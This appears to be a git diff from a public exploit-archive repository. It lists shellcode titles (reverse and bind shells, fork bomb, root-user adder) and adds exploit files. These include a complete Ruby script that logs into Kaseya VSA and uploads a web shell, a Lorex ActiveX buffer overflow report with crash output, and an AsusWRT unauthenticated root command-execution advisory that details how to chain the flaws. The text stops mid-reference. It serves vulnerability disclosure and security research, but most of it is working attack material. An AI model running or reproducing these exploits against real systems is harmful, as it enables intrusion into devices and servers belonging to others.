Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Linux/x86-64 - mkdir() Shellcode (25 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Linux/x64 - mkdir() Shellcode (25 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) Linux/x64 - execve(/bin/sh) Shellcode (22 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes) FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes) FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) Linux/x86-64 - shutdown -h now Shellcode (65 bytes) Linux/x86-64 - shutdown -h now Shellcode (64 bytes) Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) Linux/x64 - Execute /bin/sh Shellcode (27 bytes) Linux/x64 - Execute /bin/sh Shellcode (24 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) Linux/x64 - shutdown -h now Shellcode (65 bytes) Linux/x64 - shutdown -h now Shellcode (64 bytes) Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) Windows/x86-64 (10) - Egghunter Shellcode (45 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) Windows/x64 (10) - Egghunter Shellcode (45 bytes) Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2) Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) Windows - cmd.exe Shellcode (718 bytes) Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1) Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) Linux/x64 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) Linux/x86-64 - Kill All Processes Shellcode (19 bytes) Linux/x86-64 - Fork Bomb Shellcode (11 bytes) Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) Linux/x64 - Kill All Processes Shellcode (19 bytes) Linux/x64 - Fork Bomb Shellcode (11 bytes) Linux/x86-64 - mkdir(evil) Shellcode (30 bytes) Linux/x64 - mkdir(evil) Shellcode (30 bytes) Windows/x86-64 - API Hooking Shellcode (117 bytes) Windows/x64 - API Hooking Shellcode (117 bytes) --- exploits/asp/webapps/43882.rb | 165 +++++++++ exploits/cgi/remote/40949.rb | 6 +- exploits/hardware/dos/43891.txt | 157 ++++++++ exploits/hardware/remote/43881.txt | 134 +++++++ exploits/hardware/webapps/43884.txt | 180 +++++++++ exploits/hardware/webapps/43885.txt | 232 ++++++++++++ exploits/hardware/webapps/43886.txt | 202 ++++++++++ exploits/multiple/local/43887.txt | 83 +++++ exploits/multiple/webapps/39288.txt | 81 +++- exploits/multiple/webapps/43892.txt | 52 +++ exploits/multiple/webapps/43893.txt | 73 ++++ exploits/multiple/webapps/43894.txt | 59 +++ exploits/multiple/webapps/43895.txt | 67 ++++ exploits/multiple/webapps/43896.txt | 94 +++++ exploits/php/webapps/43888.txt | 32 ++ exploits/php/webapps/43889.txt | 278 ++++++++++++++ exploits/windows/webapps/37621.txt | 46 +-- exploits/windows/webapps/43883.txt | 93 +++++ files_exploits.csv | 109 +++--- files_shellcodes.csv | 349 +++++++++--------- shellcodes/arm/{14113.txt => 14113.c} | 0 shellcodes/arm/{14116.txt => 14116.c} | 0 shellcodes/arm/{14122.txt => 14122.c} | 0 shellcodes/generator/{36411.txt => 36411.py} | 0 .../linux_x86-64/{13915.txt => 13915.c} | 0 .../linux_x86-64/{35205.txt => 35205.asm} | 0 .../linux_x86-64/{40122.txt => 40122.c} | 0 .../linux_x86-64/{41750.txt => 41750.asm} | 0 shellcodes/linux_x86/{13424.txt => 13424.c} | 0 shellcodes/linux_x86/{13578.txt => 13578.asm} | 0 shellcodes/linux_x86/{13586.txt => 13586.asm} | 0 shellcodes/linux_x86/{13599.txt => 13599.c} | 0 shellcodes/linux_x86/{13600.txt => 13600.c} | 0 shellcodes/linux_x86/{13601.txt => 13601.c} | 0 shellcodes/linux_x86/{13602.txt => 13602.c} | 0 shellcodes/linux_x86/{13703.txt => 13703.c} | 0 shellcodes/linux_x86/{13725.txt => 13725.c} | 0 shellcodes/linux_x86/{13726.txt => 13726.c} | 0 shellcodes/linux_x86/{17194.txt => 17194.c} | 0 shellcodes/linux_x86/{35519.txt => 35519.c} | 0 shellcodes/linux_x86/43890.c | 172 +++++++++ shellcodes/netbsd_x86/{13474.txt => 13474.c} | 0 .../solaris_sparc/{13494.txt => 13494.c} | 0 .../solaris_sparc/{13497.txt => 13497.c} | 0 shellcodes/solaris_x86/{13501.txt => 13501.c} | 0 shellcodes/solaris_x86/{13502.txt => 13502.c} | 0 shellcodes/unixware/{13503.txt => 13503.c} | 0 shellcodes/windows/{13649.txt => 13649.as} | 0 shellcodes/windows/{33836.txt => 33836.c} | 0 .../windows_x86-64/{13719.txt => 13719.c} | 0 .../windows_x86-64/{13729.txt => 13729.c} | 0 .../windows_x86-64/{41827.txt => 41827.asm} | 0 .../windows_x86/{13635.txt => 13635.as} | 0 .../windows_x86/{13642.txt => 13642.asm} | 0 .../windows_x86/{16283.txt => 16283.asm} | 0 shellcodes/windows_x86/{17545.txt => 17545.c} | 0 56 files changed, 2410 insertions(+), 254 deletions(-) create mode 100755 exploits/asp/webapps/43882.rb create mode 100644 exploits/hardware/dos/43891.txt create mode 100644 exploits/hardware/remote/43881.txt create mode 100644 exploits/hardware/webapps/43884.txt create mode 100644 exploits/hardware/webapps/43885.txt create mode 100644 exploits/hardware/webapps/43886.txt create mode 100644 exploits/multiple/local/43887.txt create mode 100644 exploits/multiple/webapps/43892.txt create mode 100644 exploits/multiple/webapps/43893.txt create mode 100644 exploits/multiple/webapps/43894.txt create mode 100644 exploits/multiple/webapps/43895.txt create mode 100644 exploits/multiple/webapps/43896.txt create mode 100644 exploits/php/webapps/43888.txt create mode 100644 exploits/php/webapps/43889.txt create mode 100644 exploits/windows/webapps/43883.txt rename shellcodes/arm/{14113.txt => 14113.c} (100%) rename shellcodes/arm/{14116.txt => 14116.c} (100%) rename shellcodes/arm/{14122.txt => 14122.c} (100%) rename shellcodes/generator/{36411.txt => 36411.py} (100%) mode change 100644 => 100755 rename shellcodes/linux_x86-64/{13915.txt => 13915.c} (100%) rename shellcodes/linux_x86-64/{35205.txt => 35205.asm} (100%) rename shellcodes/linux_x86-64/{40122.txt => 40122.c} (100%) rename shellcodes/linux_x86-64/{41750.txt => 41750.asm} (100%) rename shellcodes/linux_x86/{13424.txt => 13424.c} (100%) rename shellcodes/linux_x86/{13578.txt => 13578.asm} (100%) rename shellcodes/linux_x86/{13586.txt => 13586.asm} (100%) rename shellcodes/linux_x86/{13599.txt => 13599.c} (100%) rename shellcodes/linux_x86/{13600.txt => 13600.c} (100%) rename shellcodes/linux_x86/{13601.txt => 13601.c} (100%) rename shellcodes/linux_x86/{13602.txt => 13602.c} (100%) rename shellcodes/linux_x86/{13703.txt => 13703.c} (100%) rename shellcodes/linux_x86/{13725.txt => 13725.c} (100%) rename shellcodes/linux_x86/{13726.txt => 13726.c} (100%) rename shellcodes/linux_x86/{17194.txt => 17194.c} (100%) rename shellcodes/linux_x86/{35519.txt => 35519.c} (100%) create mode 100644 shellcodes/linux_x86/43890.c rename shellcodes/netbsd_x86/{13474.txt => 13474.c} (100%) rename shellcodes/solaris_sparc/{13494.txt => 13494.c} (100%) rename shellcodes/solaris_sparc/{13497.txt => 13497.c} (100%) rename shellcodes/solaris_x86/{13501.txt => 13501.c} (100%) rename shellcodes/solaris_x86/{13502.txt => 13502.c} (100%) rename shellcodes/unixware/{13503.txt => 13503.c} (100%) rename shellcodes/windows/{13649.txt => 13649.as} (100%) rename shellcodes/windows/{33836.txt => 33836.c} (100%) rename shellcodes/windows_x86-64/{13719.txt => 13719.c} (100%) rename shellcodes/windows_x86-64/{13729.txt => 13729.c} (100%) rename shellcodes/windows_x86-64/{41827.txt => 41827.asm} (100%) rename shellcodes/windows_x86/{13635.txt => 13635.as} (100%) rename shellcodes/windows_x86/{13642.txt => 13642.asm} (100%) rename shellcodes/windows_x86/{16283.txt => 16283.asm} (100%) rename shellcodes/windows_x86/{17545.txt => 17545.c} (100%) diff --git a/exploits/asp/webapps/43882.rb b/exploits/asp/webapps/43882.rb new file mode 100755 index 000000000..df362da38 --- /dev/null +++ b/exploits/asp/webapps/43882.rb @@ -0,0 +1,165 @@ +#!/usr/bin/ruby +# +# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450) +# =================== +# by Pedro Ribeiro / Agile Information Security +# Disclosure date: 28/09/2015 +# +# Usage: ./kazPwn.rb http[s]://[:port] +# +# execjs and mechanize gems are required to run this exploit +# +# According to Kaseya's advisory, this exploit should work for the following VSA versions: +# VSA Version 7.0.0.0 – 7.0.0.32 +# VSA Version 8.0.0.0 – 8.0.0.22 +# VSA Version 9.0.0.0 – 9.0.0.18 +# VSA Version 9.1.0.0 – 9.1.0.8 +# This exploit has been tested with v8 and v9. +# +# Check out these two companion vulnerabilities, both of which have Metasploit modules: +# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449) +# - Unauthenticated remote privilege escalation (CVE-2015-6922 / ZDI-15-448) +# +# This code is released under the GNU General Public License v3 +# http://www.gnu.org/licenses/gpl-3.0.html +# + +require 'execjs' +require 'mechanize' +require 'open-uri' +require 'uri' +require 'openssl' + +# avoid certificate errors +OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE +I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil + +# Fixes a Mechanize bug, see +# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/ +class Mechanize::HTTP::Agent + MAX_RESET_RETRIES = 10 + + # We need to replace the core Mechanize HTTP method: + # + # Mechanize::HTTP::Agent#fetch + # + # with a wrapper that handles the infamous "too many connection resets" + # Mechanize bug that is described here: + # + # https://github.com/sparklemotion/mechanize/issues/123 + # + # The wrapper shuts down the persistent HTTP connection when it fails with + # this error, and simply tries again. In practice, this only ever needs to + # be retried once, but I am going to let it retry a few times + # (MAX_RESET_RETRIES), just in case. + # + def fetch_with_retry( + uri, + method = :get, + headers = {}, + params = [], + referer = current_page, + redirects = 0 + ) + action = "#{method.to_s.upcase} #{uri.to_s}" + retry_count = 0 + + begin + fetch_without_retry(uri, method, headers, params, referer, redirects) + rescue Net::HTTP::Persistent::Error => e + # Pass on any other type of error. + raise unless e.message =~ /too many connection resets/ + + # Pass on the error if we've tried too many times. + if retry_count >= MAX_RESET_RETRIES + puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}" + raise + end + + # Otherwise, shutdown the persistent HTTP connection and try again. + # puts "**** WARN: Mechanize retrying connection reset error: #{action}" + retry_count += 1 + self.http.shutdown + retry + end + end + + # Alias so #fetch actually uses our new #fetch_with_retry to wrap the + # old one aliased as #fetch_without_retry. + alias_method :fetch_without_retry, :fetch + alias_method :fetch, :fetch_with_retry +end + +if ARGV.length < 4 + puts 'Usage: ./kazPwn.rb http[s]://[:port] ' + exit -1 +end + +host = ARGV[0] +username = ARGV[1] +password = ARGV[2] +shell_file = ARGV[3] + +login_url = host + '/vsapres/web20/core/login.aspx' +agent = Mechanize.new + +# 1- go to the login URL, get a session cookie and the challenge. +page = agent.get(login_url) +login_form = page.forms.first +challenge = login_form['loginFormControl$ChallengeValueField'] + +# 2- calculate the password hashes with the challenge +source = open(host + "/inc/sha256.js").read +source += open(host + "/inc/coverPass.js").read +source += open(host + "/inc/coverPass256.js").read +source += open(host + "/inc/coverData.js").read +source += open(host + "/inc/passwordHashes.js").read +source.gsub!(/\<\!--(\s)*\#include.*--\>/, "") # remove any includes, this causes execjs to fail +context = ExecJS.compile(source) +hashes = context.call("getHashes",username,password,challenge) + +# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file +# We need the following input values to login: +# - __EVENTTARGET (empty) +# - __EVENTARGUMENT (empty) +# - __VIEWSTATE (copied from the original GET request) +# - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty) +# - __EVENTVALIDATION (copied from the original GET request) +# - loginFormControl$UsernameTextbox (username) +# - loginFormControl$PasswordTextbox (empty) +# - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon") +# - loginFormControl$SHA1Field (output from getHashes) +# - loginFormControl$RawSHA1Field (output from getHashes) +# - loginFormControl$SHA256Field (output from getHashes) +# - loginFormControl$RawSHA256Field (output from getHashes) +# - loginFormControl$ChallengeValueField (copied from the original GET request) +# - loginFormControl$TimezoneOffset ("0") +# - loginFormControl$ScreenHeight (any value between 800 - 2048) +# - loginFormControl$ScreenWidth (any value between 800 - 2048) +login_form['__EVENTTARGET'] = '' +login_form['__EVENTARGUMENT'] = '' +login_form['loginFormControl$UsernameTextbox'] = username +login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash'] +login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash'] +login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash'] +login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash'] +login_form['loginFormControl$TimezoneOffset'] = 0 +login_form['loginFormControl$SubmitButton'] = 'Logon' +login_form['loginFormControl$screenHeight'] = rand(800..2048) +login_form['loginFormControl$screenWidth'] = rand(800..2048) +page = agent.submit(login_form) +web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId'] + +# 4- upload the file using the ReferringWebWindowId +page = agent.post('/vsapres/web20/json.ashx', + 'directory' => "../WebPages", + 'ReferringWebWindowId' => web_windowId, + 'request' => 'uploadFile', + 'impinf__uploadfilelocation' => File.open(shell_file) +) + +if page.code == "200" + puts "Shell uploaded, check " + host + "/" + File.basename(shell_file) +else + puts "Error occurred, shell was not uploaded correctly..." +end \ No newline at end of file diff --git a/exploits/cgi/remote/40949.rb b/exploits/cgi/remote/40949.rb index e8a42a9d3..c146cfa8b 100755 --- a/exploits/cgi/remote/40949.rb +++ b/exploits/cgi/remote/40949.rb @@ -1,12 +1,10 @@ # -# Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb -# # Remote code execution in NETGEAR WNR2000v5 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security # Released on 20/12/2016 # -# NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot. -# A more reliable Metasploit module will be released soon. +# NOTE: this exploit is "alpha" quality and has been deprecated. Please see the modules +# accepted into the Metasploit framework, or https://github.com/pedrib/PoC/tree/master/exploits/metasploit/wnr2000 # # # TODO: diff --git a/exploits/hardware/dos/43891.txt b/exploits/hardware/dos/43891.txt new file mode 100644 index 000000000..773ca16d1 --- /dev/null +++ b/exploits/hardware/dos/43891.txt @@ -0,0 +1,157 @@ +Disclosure: 09/01/2014 / Last updated: 18/01/2015 + + +Hi, + +I have discovered a buffer overflow vulnerability that allows remote code execution in an ActiveX control bundled by a manufacturer of video surveillance systems. +The company is Lorex Technologies, a major video surveillance manufacturer that is very popular in the US and East Asia. Their affected product range is the EDGE series, which has 16 products in it. I have confirmed that all 16 are vulnerable at this point in time. These security DVR's are remotely accessible, and when you access it on a Windows computer with Internet Explorer, they try to install the vulnerable ActiveX control INetViewX. The Lorex manual[1] instructs the user to blindly accept the ActiveX control install when prompted. +The full list of devices, as well as links to the firware download, can be found in [2]. Their products offer remote video viewing capabilities, and you can find some of them on Shodan[3]. + +The buffer overflow can be triggered by a really long string (10000+ characters) in the HTTP_PORT parameter. The instruction pointer can be very easily controlled in XP by the characters 109 to 113 in the string. Please refer to the PoC file lorex-testcase.html. You will see that the HTTP_PORT parameter is composed of D's, apart from chars 109 to 113 which are four A's. If you open this file in IE after installing the control, you will see that IE will crash with an EIP of 0x41414141. Changing the four A's to any other value will cause EIP to crash on that value. + +The list below tells a better story about what is affected and how it can be controlled: +Win XP SP3 with IE6 - Fully exploitable as described +Win XP SP3 with IE8 - Could not get it to crash (????) +Win 7 x64 with IE10 fully patched - Fully exploitable, though not as easy as for XP (see analyze -v [4] and !exploitable [5] outputs) + +To verify this vulnerability you can download and extract the firmware using binwalk (http://code.google.com/p/binwalk/). To do so, please follow the instructions in [6], and then install the ActiveX control in INetViewProj1_02030330.cab. + +I have contacted Lorex and they initially said they would fix it, but went radio silent shortly afterwards. +17.11.2013 - Initial contact via support page +18.11.2013 - Email to sales, no response. +21.11.2013 - Second email to sales, received response by sales saying they will forward it to technical support and get back to me. +04.12.2013 - Third email to sales saying that technical support never contacted me back. No response. +08.01.2014 - MITRE assigns CVE-2014-1201 to this issue. +09.01.2014 - Public disclosure. + +All references can be found at: +https://github.com/pedrib/PoC/blob/master/lorexActivex/lorex-report.txt + +Proof of concept: +https://raw.githubusercontent.com/pedrib/PoC/master/lorexActivex/lorex-testcase.html + +Regards, +Pedro Ribeiro (pedrib@gmail.com) +Agile Information Security + + +------------------------- +[1] Lorex manual for LH300 series +------------------------- +http://www.lorextechnology.com/downloads/security-dvr/LH300-Series/LH300_SERIES_MANUAL_EN_R2_web.pdf + + +------------------------- +[2] List of vulnerable device families and URL for firmware download +------------------------- +LH340-Series 960H security video recorder Edge 3 series (2 devices affected) +http://www.lorextechnology.com/downloads/security-dvr/LH340-Series/LH340_SERIES_FIRMWARE_8CH_11.19.85_1FE3A.zip + +LH330-Series Security DVR system Edge2 series (3 devices affected) +http://www.lorextechnology.com/downloads/security-dvr/LH330-Series/LH330_SERIES_FIRMWARE_8CH_11.17.38-33_1D97A.zip + +LH320-Series Surveillance DVR Edge+ series (5 devices affected) +http://www.lorextechnology.com/downloads/security-dvr/LH300-Series/LH300_SERIES_FIRMWARE_4CH_7-35-28-1B26E.zip + +LH310-Series DVR for surveillance cameras Edge series (6 devices affected) +http://www.lorextechnology.com/downloads/security-dvr/LH300-Series/LH300_SERIES_FIRMWARE_4CH_7-35-28-1B26E.zip + + + +------------------------- +[3] Shodan link for Lorex DVR's +------------------------- +https://scanhub.shodan.io/scanhub-demo/search?q=%28os.name%3A%22LOREX+SECURITY+DVR%22%29+AND+os.name.name_facet%3A%22Lorex+Security+DVR%22 + + +------------------------- +[4] Win 7 x64 IE10 Analyze -v output +------------------------- +FOLLOWUP_IP: +INetViewProj1!Inetviewimpl1Finalize+563d +09a7f911 f2ae repne scas byte ptr es:[edi] + +APP: iexplore.exe + +PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS + +BUGCHECK_STR: APPLICATION_FAULT_WRONG_SYMBOLS + +IP_ON_HEAP: 0000000044444444 +The fault address in not in any loaded module, please check your build's rebase +log at \bin\build_logs\timebuild\ntrebase.log for module which may +contain the address if it were loaded. + +IP_IN_FREE_BLOCK: 44444444 + +FRAME_ONE_INVALID: 1 + +LAST_CONTROL_TRANSFER: from 0000000044444444 to 0000000009a7f911 + +STACK_TEXT: +WARNING: Stack unwind information not available. Following frames may be wrong. +04bbc724 44444444 44444444 44444444 44444444 INetViewProj1!Inetviewimpl1Finalize+0x563d +04bbc728 44444444 44444444 44444444 44444444 0x44444444 +04bbc72c 44444444 44444444 44444444 44444444 0x44444444 +04bbc730 44444444 44444444 44444444 44444444 0x44444444 +04bbc734 44444444 44444444 44444444 44444444 0x44444444 + + +------------------------- +[5] Win 7 x64 IE10 !exploitable output +------------------------- +0:008:x86> !exploitable + +!exploitable 1.6.0.0 +Exploitability Classification: EXPLOITABLE +Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at INetViewProj1!Inetviewimpl1Finalize+0x000000000000563d (Hash=0xe1e32303.0x6b2fc9c7) + +Corruption of the exception handler chain is considered exploitable + + +------------------------- +[6] How to extract the vulnerable ActiveX control from the firmware image +------------------------- +wget http://www.lorextechnology.com/downloads/security-dvr/LH340-Series/LH340_SERIES_FIRMWARE_8CH_11.19.85_1FE3A.zip +unzip LH340_SERIES_FIRMWARE_8CH_11.19.85_1FE3A.zip +binwalk -e 62082\(lorex\)os_11.19.85_1FE3A.rom +cd _62082\(lorex\)os_11.19.85_1FE3A.rom.extracted/ +7z x 6B2000 +cd web +ls -la INetViewProj1_02030330.cab + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/hardware/remote/43881.txt b/exploits/hardware/remote/43881.txt new file mode 100644 index 000000000..5eaddaf3d --- /dev/null +++ b/exploits/hardware/remote/43881.txt @@ -0,0 +1,134 @@ +>> Unauthenticated LAN remote code execution in AsusWRT +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +================================================================================= +Disclosure: 22/01/2018 / Last updated: 25/01/2018 + + +>> Background and summary +AsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers. +Thankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers. + +However due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user. + +A special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory). + + +>> Technical details: +#1 +Vulnerability: HTTP server authentication bypass +CVE-2018-5999 +Attack Vector: Remote +Constraints: None; exploitable by an unauthenticated attacker +Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 + +The AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions. +In AsusWRT_source/router/httpd/httpd.c: + +handle_request(void) +{ +... + handler->auth(auth_userid, auth_passwd, auth_realm); + auth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); + + if (auth_result != 0) <--- auth fails + { + if(strcasecmp(method, "post") == 0){ + if (handler->input) { + handler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed + } + send_login_page(fromapp, auth_result, NULL, NULL, 0); + } + //if(!fromapp) http_logout(login_ip_tmp, cookies); + return; + } +... +} + +This can (and will) be combined with other vulnerabilities to achieve remote code execution. + + +#2 +Vulnerability: Unauthorised configuration change (NVRAM value setting) +CVE-2018-6000 +Attack Vector: Remote +Constraints: None; exploitable by an unauthenticated attacker +Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 + +By abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request. +In AsusWRT_source/router/httpd/web.c: + +do_vpnupload_post(char *url, FILE *stream, int len, char *boundary) +{ +... + if (!strncasecmp(post_buf, "Content-Disposition:", 20)) { + if(strstr(post_buf, "name=\"file\"")) + break; + else if(strstr(post_buf, "name=\"")) { + offset = strlen(post_buf); + fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); + len -= strlen(post_buf) - offset; + offset = strlen(post_buf); + fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); + len -= strlen(post_buf) - offset; + p = post_buf; + name = strstr(p, "\"") + 1; + p = strstr(name, "\""); + strcpy(p++, "\0"); + value = strstr(p, "\r\n\r\n") + 4; + p = strstr(value, "\r"); + strcpy(p, "\0"); + //printf("%s=%s\n", name, value); + nvram_set(name, value); + } + } +... +} + +These NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker. + +Once that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH. + +A more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999. +The daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website). + +However we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords. + +(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015). + +Packet structure (from AsusWRT_source/router/shared/iboxcom.h): +- Header + typedef struct iboxPKTEx + { + BYTE ServiceID; + BYTE PacketType; + WORD OpCode; + DWORD Info; // Or Transaction ID + BYTE MacAddress[6]; + BYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string + } ibox_comm_pkt_hdr_ex; + +- Body + typedef struct iboxPKTCmd + { + WORD len; + BYTE cmd[420]; <--- command goes here + } PKT_SYSCMD; // total 422 bytes + +A Metasploit module exploiting this vulnerability has been released [3]. + + +>> Fix: +Upgrade to AsusWRT v3.0.0.4.384.10007 or above. +See [4] for the very few details and new firmware released by Asus. + + +>> References: +[1] https://blogs.securiteam.com/index.php/archives/3589 +[2] https://github.com/jduck/asus-cmd +[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb +[4] 